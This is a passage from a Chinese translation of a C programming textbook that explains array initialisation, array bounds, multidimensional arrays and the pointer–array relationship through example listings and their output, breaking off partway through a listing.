代码中的PI已定义为宏。C使用新的语法来初始化数组,如下所示: int main(void) { int powers[8] = {1,2,4,6,8,16,32,64}; /* 从ANSI C开始支持这种初始化 */ ... } 如上所示,用以逗号分隔的值列表(用花括号括起来)来初始化数组, 各值之间用逗号分隔。在逗号和值之间可以使用空格。根据上面的初始化, 把 1 赋给数组的首元素(powers[0]),以此类推(不支持ANSI的编译器会 把这种形式的初始化识别为语法错误,在数组声明前加上关键字static可解 决此问题。第12章将详细讨论这个关键字)。 程序清单10.1演示了一个小程序,打印每个月的天数。 程序清单10.1 day_mon1.c程序 /* day_mon1.c -- 打印每个月的天数 */ #include <stdio.h> #define MONTHS 12 643 int main(void) { int days[MONTHS] = { 31, 28, 31, 30, 31, 30, 31, 31,  30, 31, 30, 31 }; int index; for (index = 0; index < MONTHS; index++) printf("Month %2d has %2d days.\n", index + 1, days[index]); return 0; } 该程序的输出如下: Month 1 has 31 days. Month 2 has 28 days. Month 3 has 31 days. Month 4 has 30 days. Month 5 has 31 days. Month 6 has 30 days. Month 7 has 31 days. Month 8 has 31 days. Month 9 has 30 days. 644 Month 10 has 31 days. Month 11 has 30 days. Month 12 has 31 days. 这个程序还不够完善,每4年打错一个月份的天数(即,2月份的天 数)。该程序用初始化列表初始化days[],列表(用花括号括起来)中用逗 号分隔各值。 注意该例使用了符号常量 MONTHS 表示数组大小,这是我们推荐且常 用的做法。例如,如果要采用一年13个月的记法,只需修改#define这行代码 即可,不用在程序中查找所有使用过数组大小的地方。 注意 使用const声明数组 有时需要把数组设置为只读。这样,程序只能从数组中检索值,不能把 新值写入数组。要创建只读数组,应该用const声明和初始化数组。因此, 程序清单10.1中初始化数组应改成: const int days[MONTHS] = {31,28,31,30,31,30,31,31,30,31,30,31}; 这样修改后,程序在运行过程中就不能修改该数组中的内容。和普通变 量一样,应该使用声明来初始化 const 数据,因为一旦声明为 const,便不能 再给它赋值。明确了这一点,就可以在后面的例子中使用const了。 如果初始化数组失败怎么办?程序清单10.2演示了这种情况。 程序清单10.2 no_data.c程序 /* no_data.c -- 为初始化数组 */ #include <stdio.h> #define SIZE 4 645 int main(void) { int no_data[SIZE]; /* 未初始化数组 */ int i; printf("%2s%14s\n",   "i", "no_data[i]"); for (i = 0; i < SIZE; i++) printf("%2d%14d\n", i, no_data[i]); return 0; } 该程序的输出如下(系统不同,输出的结果可能不同): i   no_data[i] 0          0 1      4204937 2      4219854 3   2147348480 使用数组前必须先初始化它。与普通变量类似,在使用数组元素之前, 必须先给它们赋初值。编译器使用的值是内存相应位置上的现有值,因此, 读者运行该程序后的输出会与该示例不同。 注意 存储类别警告 数组和其他变量类似,可以把数组创建成不同的存储类别(storage 646 class)。第12章将介绍存储类别的相关内容,现在只需记住:本章描述的数 组属于自动存储类别,意思是这些数组在函数内部声明,且声明时未使用关 键字static。到目前为止,本书所用的变量和数组都是自动存储类别。 在这里提到存储类别的原因是,不同的存储类别有不同的属性,所以不 能把本章的内容推广到其他存储类别。对于一些其他存储类别的变量和数 组,如果在声明时未初始化,编译器会自动把它们的值设置为0。 初始化列表中的项数应与数组的大小一致。如果不一致会怎样?我们还 是以上一个程序为例,但初始化列表中缺少两个元素,如程序清单10.3所 示: 程序清单10.3 somedata.c程序 /* some_data.c -- 部分初始化数组 */ #include <stdio.h> #define SIZE 4 int main(void) { int some_data[SIZE] = { 1492, 1066 }; int i; printf("%2s%14s\n",   "i", "some_data[i]"); for (i = 0; i < SIZE; i++) printf("%2d%14d\n", i, some_data[i]); return 0; 647 } 下面是该程序的输出: i some_data[i] 0       1492 1       1066 2         0 3         0 如上所示,编译器做得很好。当初始化列表中的值少于数组元素个数 时,编译器会把剩余的元素都初始化为0。也就是说,如果不初始化数组, 数组元素和未初始化的普通变量一样,其中储存的都是垃圾值;但是,如果 部分初始化数组,剩余的元素就会被初始化为0。 如果初始化列表的项数多于数组元素个数,编译器可没那么仁慈,它会 毫不留情地将其视为错误。但是,没必要因此嘲笑编译器。其实,可以省略 方括号中的数字,让编译器自动匹配数组大小和初始化列表中的项数(见程 序清单10.4) 程序清单10.4 day_mon2.c程序 /* day_mon2.c -- 让编译器计算元素个数 */ #include <stdio.h> int main(void) { const int days[] = { 31, 28, 31, 30, 31, 30, 31, 31,  30, 31 }; 648 int index; for (index = 0; index < sizeof days / sizeof days[0];  index++) printf("Month %2d has %d days.\n", index + 1, days[index]); return 0; } 在程序清单10.4中,要注意以下两点。 如果初始化数组时省略方括号中的数字,编译器会根据初始化列表中的 项数来确定数组的大小。 注意for循环中的测试条件。由于人工计算容易出错,所以让计算机来 计算数组的大小。sizeof运算符给出它的运算对象的大小(以字节为单 位)。所以sizeof days是整个数组的大小(以字节为单位),sizeof day[0]是 数组中一个元素的大小(以字节为单位)。整个数组的大小除以单个元素的 大小就是数组元素的个数。 下面是该程序的输出: Month 1 has 31 days. Month 2 has 28 days. Month 3 has 31 days. Month 4 has 30 days. Month 5 has 31 days. Month 6 has 30 days. 649 Month 7 has 31 days. Month 8 has 31 days. Month 9 has 30 days. Month 10 has 31 days. 我们的本意是防止初始化值的个数超过数组的大小,让程序找出数组大 小。我们初始化时用了10个值,结果就只打印了10个值!这就是自动计数的 弊端:无法察觉初始化列表中的项数有误。 还有一种初始化数组的方法,但这种方法仅限于初始化字符数组。我们 在下一章中介绍。 10.1.2 指定初始化器(C99) C99 增加了一个新特性:指定初始化器(designated initializer)。利用 该特性可以初始化指定的数组元素。例如,只初始化数组中的最后一个元 素。对于传统的C初始化语法,必须初始化最后一个元素之前的所有元素, 才能初始化它: int arr[6] = {0,0,0,0,0,212}; // 传统的语法 而C99规定,可以在初始化列表中使用带方括号的下标指明待初始化的 元素: int arr[6] = {[5] = 212}; // 把arr[5]初始化为212 对于一般的初始化,在初始化一个元素后,未初始化的元素都会被设置 为0。程序清单10.5中的初始化比较复杂。 程序清单10.5 designate.c程序 // designate.c -- 使用指定初始化器 650 #include <stdio.h> #define MONTHS 12 int main(void) { int days[MONTHS] = { 31, 28, [4] = 31, 30, 31, [1]  = 29 }; int i; for (i = 0; i < MONTHS; i++) printf("%2d  %d\n", i + 1, days[i]); return 0; } 该程序在支持C99的编译器中输出如下: 1   31 2   29 3   0 4   0 5   31 6   30 7   31 651 8   0 9   0 10   0 11   0 12   0 以上输出揭示了指定初始化器的两个重要特性。第一,如果指定初始化 器后面有更多的值,如该例中的初始化列表中的片段:[4] = 31,30,31,那么 后面这些值将被用于初始化指定元素后面的元素。也就是说,在days[4]被初 始化为31后,days[5]和days[6]将分别被初始化为30和31。第二,如果再次初 始化指定的元素,那么最后的初始化将会取代之前的初始化。例如,程序清 单10.5中,初始化列表开始时把days[1]初始化为28,但是days[1]又被后面的 指定初始化[1] = 29初始化为29。 如果未指定元素大小会怎样? int stuff[] = {1, [6] = 23};     //会发生什么? int staff[] = {1, [6] = 4, 9, 10}; //会发生什么? 编译器会把数组的大小设置为足够装得下初始化的值。所以,stuff数组 有7个元素,编号为0~6;而staff数组的元素比stuff数组多两个(即有9个元 素)。 10.1.3 给数组元素赋值 声明数组后,可以借助数组下标(或索引)给数组元素赋值。例如,下 面的程序段给数组的所有元素赋值: /* 给数组的元素赋值 */ 652 #include <stdio.h> #define SIZE 50 int main(void) { int counter, evens[SIZE]; for (counter = 0; counter < SIZE; counter++) evens[counter] = 2 * counter; ... } 注意这段代码中使用循环给数组的元素依次赋值。C 不允许把数组作为 一个单元赋给另一个数组,除初始化以外也不允许使用花括号列表的形式赋 值。下面的代码段演示了一些错误的赋值形式: /* 一些无效的数组赋值 */ #define SIZE 5 int main(void) { int oxen[SIZE] = {5,3,2,8};     /* 初始化没问题 */ int yaks[SIZE]; yaks = oxen;          /* 不允许 */ yaks[SIZE] = oxen[SIZE];    /* 数组下标越界 */ 653 yaks[SIZE] = {5,3,2,8};    /* 不起作用 */ oxen数组的最后一个元素是oxen[SIZE-1],所以oxen[SIZE]和yaks[SIZE] 都超出了两个数组的末尾。 10.1.4 数组边界 在使用数组时,要防止数组下标超出边界。也就是说,必须确保下标是 有效的值。例如,假设有下面的声明: int doofi[20]; 那么在使用该数组时,要确保程序中使用的数组下标在0~19的范围 内,因为编译器不会检查出这种错误(但是,一些编译器发出警告,然后继 续编译程序)。 考虑程序清单10.6的问题。该程序创建了一个内含4个元素的数组,然 后错误地使用了-1~6的下标。 程序清单10.6 bounds.c程序 // bounds.c -- 数组下标越界 #include <stdio.h> #define SIZE 4 int main(void) { int value1 = 44; int arr[SIZE]; int value2 = 88; 654 int i; printf("value1 = %d, value2 = %d\n", value1, value2); for (i = -1; i <= SIZE; i++) arr[i] = 2 * i + 1; for (i = -1; i < 7; i++) printf("%2d %d\n", i, arr[i]); printf("value1 = %d, value2 = %d\n", value1, value2); printf("address of arr[-1]: %p\n", &arr[-1]); printf("address of arr[4]: %p\n", &arr[4]); printf("address of value1: %p\n", &value1); printf("address of value2: %p\n", &value2); return 0; } 编译器不会检查数组下标是否使用得当。在C标准中,使用越界下标的 结果是未定义的。这意味着程序看上去可以运行,但是运行结果很奇怪,或 异常中止。下面是使用GCC的输出示例: value1 = 44, value2 = 88 -1 -1 0 1 1 3 655 2 5 3 7 4 9 5 1624678494 6 32767 value1 = 9, value2 = -1 address of arr[-1]:  0x7fff5fbff8cc address of arr[4]:  0x7fff5fbff8e0 address of value1:  0x7fff5fbff8e0 address of value2:  0x7fff5fbff8cc 注意,该编译器似乎把value2储存在数组的前一个位置,把value1储存 在数组的后一个位置(其他编译器在内存中储存数据的顺序可能不同)。在 上面的输出中,arr[-1]与value2对应的内存地址相同, arr[4]和value1对应的 内存地址相同。因此,使用越界的数组下标会导致程序改变其他变量的值。 不同的编译器运行该程序的结果可能不同,有些会导致程序异常中止。 C 语言为何会允许这种麻烦事发生?这要归功于 C 信任程序员的原 则。不检查边界,C 程序可以运行更快。编译器没必要捕获所有的下标错 误,因为在程序运行之前,数组的下标值可能尚未确定。因此,为安全起 见,编译器必须在运行时添加额外代码检查数组的每个下标值,这会降低程 序的运行速度。C 相信程序员能编写正确的代码,这样的程序运行速度更 快。但并不是所有的程序员都能做到这一点,所以就出现了下标越界的问 题。 还要记住一点:数组元素的编号从0开始。最好是在声明数组时使用符 656 号常量来表示数组的大小: #define SIZE 4 int main(void) { int arr[SIZE]; for (i = 0; i < SIZE; i++) .... 这样做能确保整个程序中的数组大小始终一致。 10.1.5 指定数组的大小 本章前面的程序示例都使用整型常量来声明数组: #define SIZE 4 int main(void) { int arr[SIZE];     // 整数符号常量 double lots[144];    // 整数字面常量 ... 在C99标准之前,声明数组时只能在方括号中使用整型常量表达式。所 谓整型常量表达式,是由整型常量构成的表达式。sizeof表达式被视为整型 常量,但是(与C++不同)const值不是。另外,表达式的值必须大于0: int n = 5; 657 int m = 8; float a1[5];         // 可以 float a2[5*2 + 1];     //可以 float a3[sizeof(int) + 1]; //可以 float a4[-4];        // 不可以,数组大小必须大于0 float a5[0];         // 不可以,数组大小必须大于0 float a6[2.5];        // 不可以,数组大小必须是整数 float a7[(int)2.5];     // 可以,已被强制转换为整型常量 float a8[n];         // C99之前不允许 float a9[m];         // C99之前不允许 上面的注释表明,以前支持C90标准的编译器不允许后两种声明方式。 而C99标准允许这样声明,这创建了一种新型数组,称为变长数组 (variable-length array)或简称 VLA(C11 放弃了这一创新的举措,把VLA 设定为可选,而不是语言必备的特性)。 C99引入变长数组主要是为了让C成为更好的数值计算语言。例如, VLA简化了把FORTRAN现有的数值计算例程库转换为C代码的过程。VLA有 一些限制,例如,声明VLA时不能进行初始化。在充分了解经典的C数组 后,我们再详细介绍VLA。 658 10.2 多维数组 气象研究员Tempest Cloud为完成她的研究项目要分析5年内每个月的降 水量数据,她首先要解决的问题是如何表示数据。一个方案是创建60个变 量,每个变量储存一个数据项(我们曾经提到过这一笨拙的方案,和以前一 样,这个方案并不合适)。使用一个内含60个元素的数组比将建60个变量 好,但是如果能把各年的数据分开储存会更好,即创建5个数组,每个数组 12个元素。然而,这样做也很麻烦,如果Tempest决定研究50年的降水量, 岂不是要创建50个数组。是否能有更好的方案? 处理这种情况应该使用数组的数组。主数组(master array)有5个元素 (每个元素表示一年),每个元素是内含12个元素的数组(每个元素表示一 个月)。下面是该数组的声明: float rain[5][12]; // 内含5个数组元素的数组,每个数组元素内含12个 float类型的元素 理解该声明的一种方法是,先查看中间部分(粗体部分): float rain[5][12]; // rain是一个内含5个元素的数组 这说明数组rain有5个元素,至于每个元素的情况,要查看声明的其余 部分(粗体部分): floatrain[5][12] ; // 一个内含12个float类型元素的数组 这说明每个元素的类型是float[12],也就是说,rain的每个元素本身都 是一个内含12个float类型值的数组。 根据以上分析可知,rain的首元素rain[0]是一个内含12个float类型值的 数组。所以,rain[1]、rain[2]等也是如此。如果 rain[0]是一个数组,那么它 的首元素就是 rain[0][0],第 2 个元素是rain[0][1],以此类推。简而言之, 数组rain有5个元素,每个元素都是内含12个float类型元素的数组,rain[0]是 659 内含12个float值的数组,rain[0][0]是一个float类型的值。假设要访问位于2 行3列的值,则使用rain[2][3](记住,数组元素的编号从0开始,所以2行指 的是第3行)。 图10.1 二维数组 该二维视图有助于帮助读者理解二维数组的两个下标。在计算机内部, 这样的数组是按顺序储存的,从第1个内含12个元素的数组开始,然后是第2 个内含12个元素的数组,以此类推。 我们要在气象分析程序中用到这个二维数组。该程序的目标是,计算每 年的总降水量、年平均降水量和月平均降水量。要计算年总降水量,必须对 一行数据求和;要计算某月份的平均降水量,必须对一列数据求和。二维数 组很直观,实现这些操作也很容易。程序清单10.7演示了这个程序。 程序清单10.7 rain.c程序 /* rain.c -- 计算每年的总降水量、年平均降水量和5年中每月的平均降 水量 */ #include <stdio.h> 660 #define MONTHS 12   // 一年的月份数 #define YEARS  5    // 年数 int main(void) { // 用2010~2014年的降水量数据初始化数组 const float rain[YEARS][MONTHS] = { { 4.3, 4.3, 4.3, 3.0, 2.0, 1.2, 0.2, 0.2, 0.4, 2.4, 3.5,  6.6 }, { 8.5, 8.2, 1.2, 1.6, 2.4, 0.0, 5.2, 0.9, 0.3, 0.9, 1.4,  7.3 }, { 9.1, 8.5, 6.7, 4.3, 2.1, 0.8, 0.2, 0.2, 1.1, 2.3, 6.1,  8.4 }, { 7.2, 9.9, 8.4, 3.3, 1.2, 0.8, 0.4, 0.0, 0.6, 1.7, 4.3,  6.2 }, { 7.6, 5.6, 3.8, 2.8, 3.8, 0.2, 0.0, 0.0, 0.0, 1.3, 2.6,  5.2 } }; int year, month; float subtot, total; printf(" YEAR   RAINFALL  (inches)\n"); 661 for (year = 0, total = 0; year < YEARS; year++) {             // 每一年,各月的降水量总和 for (month = 0, subtot = 0; month < MONTHS; month++) subtot += rain[year][month]; printf("%5d %15.1f\n", 2010 + year, subtot); total += subtot;  // 5年的总降水量 } printf("\nThe yearly average is %.1f inches.\n\n", total /  YEARS); printf("MONTHLY AVERAGES:\n\n"); printf(" Jan  Feb  Mar  Apr  May  Jun  Jul  Aug  Sep  Oct "); printf(" Nov  Dec\n"); for (month = 0; month < MONTHS; month++) {             // 每个月,5年的总降水量 for (year = 0, subtot = 0; year < YEARS; year++) subtot += rain[year][month]; printf("%4.1f ", subtot / YEARS); } printf("\n"); 662 return 0; } 下面是该程序的输出: YEAR   RAINFALL  (inches) 2010        32.4 2011        37.9 2012        49.8 2013        44.0 2014        32.9 The yearly average is 39.4 inches. MONTHLY AVERAGES: Jan Feb Mar Apr May Jun Jul Aug Sep Oct Nov Dec 7.3 7.3 4.9 3.0 2.3 0.6 1.2 0.3 0.5 1.7 3.6 6.7 学习该程序的重点是数组初始化和计算方案。初始化二维数组比较复 杂,我们先来看较为简单的计算部分。 程序使用了两个嵌套for循环。第1个嵌套for循环的内层循环,在year不 变的情况下,遍历month计算某年的总降水量;而外层循环,改变year的 值,重复遍历month,计算5年的总降水量。这种嵌套循环结构常用于处理二 维数组,一个循环处理数组的第1个下标,另一个循环处理数组的第2个下 标: for (year = 0, total = 0; year < YEARS; year++) 663 { // 处理每一年的数据 for (month = 0, subtot = 0; month < MONTHS; month++) ...// 处理每月的数据 ...//处理每一年的数据 } 第2个嵌套for循环和第1个的结构相同,但是内层循环遍历year,外层循 环遍历month。记住,每执行一次外层循环,就完整遍历一次内层循环。因 此,在改变月份之前,先遍历完年,得到某月 5 年间的平均降水量,以此类 推: for (month = 0; month < MONTHS; month++) { // 处理每月的数据 for (year = 0, subtot =0; year < YEARS; year++) ...// 处理每年的数据 ...// 处理每月的数据 } 10.2.1 初始化二维数组 初始化二维数组是建立在初始化一维数组的基础上。首先,初始化一维 数组如下: sometype ar1[5] = {val1, val2, val3, val4, val5}; 这里,val1、val2等表示sometype类型的值。例如,如果sometype是int, 那么val1可能是7;如果sometype是double,那么val1可能是11.34,诸如此 664 类。但是rain是一个内含5个元素的数组,每个元素又是内含12个float类型元 素的数组。所以,对rain而言,val1应该包含12个值,用于初始化内含12个 float类型元素的一维数组,如下所示: {4.3,4.3,4.3,3.0,2.0,1.2,0.2,0.2,0.4,2.4,3.5,6.6} 也就是说,如果sometype是一个内含12个double类型元素的数组,那么 val1就是一个由12个double类型值构成的数值列表。因此,为了初始化二维 数组rain,要用逗号分隔5个这样的数值列表: const float rain[YEARS][MONTHS] = { {4.3,4.3,4.3,3.0,2.0,1.2,0.2,0.2,0.4,2.4,3.5,6.6}, {8.5,8.2,1.2,1.6,2.4,0.0,5.2,0.9,0.3,0.9,1.4,7.3}, {9.1,8.5,6.7,4.3,2.1,0.8,0.2,0.2,1.1,2.3,6.1,8.4}, {7.2,9.9,8.4,3.3,1.2,0.8,0.4,0.0,0.6,1.7,4.3,6.2}, {7.6,5.6,3.8,2.8,3.8,0.2,0.0,0.0,0.0,1.3,2.6,5.2} }; 这个初始化使用了5个数值列表,每个数值列表都用花括号括起来。第1 个列表的数据用于初始化数组的第1行,第2个列表的数据用于初始化数组的 第2行,以此类推。前面讨论的数据个数和数组大小不匹配的问题同样适用 于这里的每一行。也就是说,如果第1个列表中只有10个数,则只会初始化 数组第1行的前10个元素,而最后两个元素将被默认初始化为0。如果某列表 中的数值个数超出了数组每行的元素个数,则会出错,但是这并不会影响其 他行的初始化。 初始化时也可省略内部的花括号,只保留最外面的一对花括号。只要保 665 证初始化的数值个数正确,初始化的效果与上面相同。但是如果初始化的数 值不够,则按照先后顺序逐行初始化,直到用完所有的值。后面没有值初始 化的元素被统一初始化为0。图10.2演示了这种初始化数组的方法。 图10.2 初始化二维数组的两种方法 因为储存在数组rain中的数据不能修改,所以程序使用了const关键字声 明该数组。 10.2.2 其他多维数组 前面讨论的二维数组的相关内容都适用于三维数组或更多维的数组。可 以这样声明一个三维数组: int box[10][20][30]; 可以把一维数组想象成一行数据,把二维数组想象成数据表,把三维数 组想象成一叠数据表。例如,把上面声明的三维数组box想象成由10个二维 数组(每个二维数组都是20行30列)堆叠起来。 还有一种理解box的方法是,把box看作数组的数组。也就是说,box内 含10个元素,每个元素是内含20个元素的数组,这20个数组元素中的每个元 素是内含30个元素的数组。或者,可以简单地根据所需的下标值去理解数 组。 通常,处理三维数组要使用3重嵌套循环,处理四维数组要使用4重嵌套 循环。对于其他多维数组,以此类推。在后面的程序示例中,我们只使用二 维数组。 666 10.3 指针和数组 第9章介绍过指针,指针提供一种以符号形式使用地址的方法。因为计 算机的硬件指令非常依赖地址,指针在某种程度上把程序员想要传达的指令 以更接近机器的方式表达。因此,使用指针的程序更有效率。尤其是,指针 能有效地处理数组。我们很快就会学到,数组表示法其实是在变相地使用指 针。 我们举一个变相使用指针的例子:数组名是数组首元素的地址。也就是 说,如果flizny是一个数组,下面的语句成立: flizny == &flizny[0]; // 数组名是该数组首元素的地址 flizny 和&flizny[0]都表示数组首元素的内存地址(&是地址运算符)。 两者都是常量,在程序的运行过程中,不会改变。但是,可以把它们赋值给 指针变量,然后可以修改指针变量的值,如程序清单10.8所示。注意指针加 上一个数时,它的值发生了什么变化(转换说明%p通常以十六进制显示指 针的值)。 程序清单10.8 pnt_add.c程序 // pnt_add.c -- 指针地址 #include <stdio.h> #define SIZE 4 int main(void) { short dates[SIZE]; short * pti; 667 short index; double bills[SIZE]; double * ptf; pti = dates; // 把数组地址赋给指针 ptf = bills; printf("%23s %15s\n", "short", "double"); for (index = 0; index < SIZE; index++) printf("pointers + %d: %10p %10p\n", index, pti + index,  ptf + index); return 0; } 下面是该例的输出示例: short        double pointers + 0: 0x7fff5fbff8dc 0x7fff5fbff8a0 pointers + 1: 0x7fff5fbff8de 0x7fff5fbff8a8 pointers + 2: 0x7fff5fbff8e0 0x7fff5fbff8b0 pointers + 3: 0x7fff5fbff8e2 0x7fff5fbff8b8 第2行打印的是两个数组开始的地址,下一行打印的是指针加1后的地 址,以此类推。注意,地址是十六进制的,因此dd比dc大1,a1比a0大1。但 是,显示的地址是怎么回事? 668 0x7fff5fbff8dc + 1是否是0x7fff5fbff8de? 0x7fff5fbff8a0 + 1是否是0x7fff5fbff8a8? 我们的系统中,地址按字节编址,short类型占用2字节,double类型占 用8字节。在C中,指针加1指的是增加一个存储单元。对数组而言,这意味 着把加1后的地址是下一个元素的地址,而不是下一个字节的地址(见图 10.3)。这是为什么必须声明指针所指向对象类型的原因之一。只知道地址 不够,因为计算机要知道储存对象需要多少字节(即使指针指向的是标量变 量,也要知道变量的类型,否则*pt 就无法正确地取回地址上的值)。 图10.3 数组和指针加法 现在可以更清楚地定义指向int的指针、指向float的指针,以及指向其他 数据对象的指针。 指针的值是它所指向对象的地址。地址的表示方式依赖于计算机内部的 669 硬件。许多计算机(包括PC和Macintosh)都是按字节编址,意思是内存中 的每个字节都按顺序编号。这里,一个较大对象的地址(如double类型的变 量)通常是该对象第一个字节的地址。 在指针前面使用*运算符可以得到该指针所指向对象的值。 指针加1,指针的值递增它所指向类型的大小(以字节为单位)。 下面的等式体现了C语言的灵活性: dates + 2 == &date[2]    // 相同的地址 *(dates + 2) == dates[2]  // 相同的值 以上关系表明了数组和指针的关系十分密切,可以使用指针标识数组的 元素和获得元素的值。从本质上看,同一个对象有两种表示法。实际上,C 语言标准在描述数组表示法时确实借助了指针。也就是说,定义ar[n]的意思 是*(ar + n)。可以认为*(ar + n)的意思是“到内存的ar位置,然后移动n个单 元,检索储存在那里的值”。 顺带一提,不要混淆 *(dates+2)和*dates+2。间接运算符(*)的优先级 高于+,所以*dates+2相当于(*dates)+2: *(dates + 2) // dates第3个元素的值 *dates + 2  // dates第1个元素的值加2 明白了数组和指针的关系,便可在编写程序时适时使用数组表示法或指 针表示法。运行程序清单 10.9后输出的结果和程序清单10.1输出的结果相 同。 程序清单10.9 day_mon3.c程序 /* day_mon3.c -- uses pointer notation */ 670 #include <stdio.h> #define MONTHS 12 int main(void) { int days[MONTHS] = { 31, 28, 31, 30, 31, 30, 31, 31,  30, 31, 30, 31 }; int index; for (index = 0; index < MONTHS; index++) printf("Month %2d has %d days.\n", index + 1, *(days + index)); //与 days[index]相同 return 0; } 这里,days是数组首元素的地址,days + index是元素days[index]的地 址,而*(days + index)则是该元素的值,相当于days[index]。for循环依次引用 数组中的每个元素,并打印各元素的内容。 这样编写程序是否有优势?不一定。编译器编译这两种写法生成的代码 相同。程序清单 10.9 要注意的是,指针表示法和数组表示法是两种等效的 方法。该例演示了可以用指针表示数组,反过来,也可以用数组表示指针。 在使用以数组为参数的函数时要注意这点。 671 10.4 函数、数组和指针 假设要编写一个处理数组的函数,该函数返回数组中所有元素之和,待 处理的是名为marbles的int类型数组。应该如何调用该函数?也许是下面这 样: total = sum(marbles); // 可能的函数调用 那么,该函数的原型是什么?记住,数组名是该数组首元素的地址,所 以实际参数marbles是一个储存int类型值的地址,应把它赋给一个指针形式 参数,即该形参是一个指向int的指针: int sum(int * ar); // 对应的函数原型 sum()从该参数获得了什么信息?它获得了该数组首元素的地址,知道 要在该位置上找出一个整数。注意,该参数并未包含数组元素个数的信息。 我们有两种方法让函数获得这一信息。第一种方法是,在函数代码中写上固 定的数组大小: int sum(int * ar) // 相应的函数定义 { int i; int total = 0; for (i = 0; i < 10; i++)  // 假设数组有10个元素 total += ar[i];    // ar[i] 与 *(ar + i) 相同 return total; } 672 既然能使用指针表示数组名,也可以用数组名表示指针。另外,回忆一 下,+=运算符把右侧运算对象加到左侧运算对象上。因此,total是当前数组 元素之和。 该函数定义有限制,只能计算10个int类型的元素。另一个比较灵活的方 法是把数组大小作为第2个参数: int sum(int * ar, int n)    // 更通用的方法 { int i; int total = 0; for (i = 0; i < n; i++)   // 使用 n 个元素 total += ar[i];    // ar[i] 和 *(ar + i) 相同 return total; } 这里,第1个形参告诉函数该数组的地址和数据类型,第2个形参告诉函 数该数组中元素的个数。 关于函数的形参,还有一点要注意。只有在函数原型或函数定义头中, 才可以用int ar[]代替int * ar: int sum (int ar[], int n); int *ar形式和int ar[]形式都表示ar是一个指向int的指针。但是,int ar[]只 能用于声明形式参数。第2种形式(int ar[])提醒读者指针ar指向的不仅仅 一个int类型值,还是一个int类型数组的元素。 注意 声明数组形参 673 因为数组名是该数组首元素的地址,作为实际参数的数组名要求形式参 数是一个与之匹配的指针。只有在这种情况下,C才会把int ar[]和int * ar解 释成一样。也就是说,ar是指向int的指针。由于函数原型可以省略参数名, 所以下面4种原型都是等价的: int sum(int *ar, int n); int sum(int *, int); int sum(int ar[], int n); int sum(int [], int); 但是,在函数定义中不能省略参数名。下面两种形式的函数定义等价: int sum(int *ar, int n) { // 其他代码已省略 } int sum(int ar[], int n); { //其他代码已省略 } 可以使用以上提到的任意一种函数原型和函数定义。 程序清单 10.10 演示了一个程序,使用 sum()函数。该程序打印原始数 组的大小和表示该数组的函数形参的大小(如果你的编译器不支持用转换说 明%zd打印sizeof返回值,可以用%u或%lu来代替)。 674 程序清单10.10 sum_arr1.c程序 // sum_arr1.c -- 数组元素之和 // 如果编译器不支持 %zd,用 %u 或 %lu 替换它 #include <stdio.h> #define SIZE 10 int sum(int ar[], int n); int main(void) { int marbles[SIZE] = { 20, 10, 5, 39, 4, 16, 19, 26,  31, 20 }; long answer; answer = sum(marbles, SIZE); printf("The total number of marbles is %ld.\n", answer); printf("The size of marbles is %zd bytes.\n", sizeof marbles); return 0; } int sum(int ar[], int n)   // 这个数组的大小是? { 675 int i; int total = 0; for (i = 0; i < n; i++) total += ar[i]; printf("The size of ar is %zd bytes.\n", sizeof ar); return total; } 该程序的输出如下: The size of ar is 8 bytes. The total number of marbles is 190. The size of marbles is 40 bytes. 注意,marbles的大小是40字节。这没问题,因为marbles内含10个int类 型的值,每个值占4字节,所以整个marbles的大小是40字节。但是,ar才8字 节。这是因为ar并不是数组本身,它是一个指向 marbles 数组首元素的指 针。我们的系统中用 8 字节储存地址,所以指针变量的大小是 8字节(其他 系统中地址的大小可能不是8字节)。简而言之,在程序清单10.10中, marbles是一个数组, ar是一个指向marbles数组首元素的指针,利用C中数组 和指针的特殊关系,可以用数组表示法来表示指针ar。 10.4.1 使用指针形参 函数要处理数组必须知道何时开始、何时结束。sum()函数使用一个指 针形参标识数组的开始,用一个整数形参表明待处理数组的元素个数(指针 形参也表明了数组中的数据类型)。但是这并不是给函数传递必备信息的唯 676 一方法。还有一种方法是传递两个指针,第1个指针指明数组的开始处(与 前面用法相同),第2个指针指明数组的结束处。程序清单10.11演示了这种 方法,同时该程序也表明了指针形参是变量,这意味着可以用索引表明访问 数组中的哪一个元素。 程序清单10.11 sum_arr2.c程序 /* sum_arr2.c -- 数组元素之和 */ #include <stdio.h> #define SIZE 10 int sump(int * start, int * end); int main(void) { int marbles[SIZE] = { 20, 10, 5, 39, 4, 16, 19, 26,  31, 20 }; long answer; answer = sump(marbles, marbles + SIZE); printf("The total number of marbles is %ld.\n", answer); return 0; } /* 使用指针算法 */ int sump(int * start, int * end) 677 { int total = 0; while (start < end) { total += *start;  // 把数组元素的值加起来 start++;      // 让指针指向下一个元素 } return total; } 指针start开始指向marbles数组的首元素,所以赋值表达式total += *start 把首元素(20)加给total。然后,表达式start++递增指针变量start,使其指 向数组的下一个元素。因为start是指向int的指针,start递增1相当于其值递增 int类型的大小。 注意,sump()函数用另一种方法结束加法循环。sum()函数把元素的个数 作为第2个参数,并把该参数作为循环测试的一部分: for( i = 0; i < n; i++) 而sump()函数则使用第2个指针来结束循环: while (start < end) 因为while循环的测试条件是一个不相等的关系,所以循环最后处理的 一个元素是end所指向位置的前一个元素。这意味着end指向的位置实际上在 数组最后一个元素的后面。C保证在给数组分配空间时,指向数组后面第一 个位置的指针仍是有效的指针。这使得 while循环的测试条件是有效的,因 678 为 start在循环中最后的值是end[1]。注意,使用这种“越界”指针的函数调用 更为简洁: answer = sump(marbles, marbles + SIZE); 因为下标从0开始,所以marbles + SIZE指向数组末尾的下一个位置。如 果end指向数组的最后一个元素而不是数组末尾的下一个位置,则必须使用 下面的代码: answer = sump(marbles, marbles + SIZE - 1); 这种写法既不简洁也不好记,很容易导致编程错误。顺带一提,虽然C 保证了marbles + SIZE有效,但是对marbles[SIZE](即储存在该位置上的 值)未作任何保证,所以程序不能访问该位置。 还可以把循环体压缩成一行代码: total += *start++; 一元运算符*和++的优先级相同,但结合律是从右往左,所以start++先 求值,然后才是*start。也就是说,指针start先递增后指向。使用后缀形式 (即start++而不是++start)意味着先把指针指向位置上的值加到total上,然 后再递增指针。如果使用*++start,顺序则反过来,先递增指针,再使用指 针指向位置上的值。如果使用(*start)++,则先使用start指向的值,再递增该 值,而不是递增指针。这样,指针将一直指向同一个位置,但是该位置上的 值发生了变化。虽然*start++的写法比较常用,但是*(start++)这样写更清 楚。程序清单10.12的程序演示了这些优先级的情况。 程序清单10.12 order.c程序 /* order.c -- 指针运算中的优先级 */ #include <stdio.h> int data[2] = { 100, 200 }; 679 int moredata[2] = { 300, 400 }; int main(void) { int * p1, *p2, *p3; p1 = p2 = 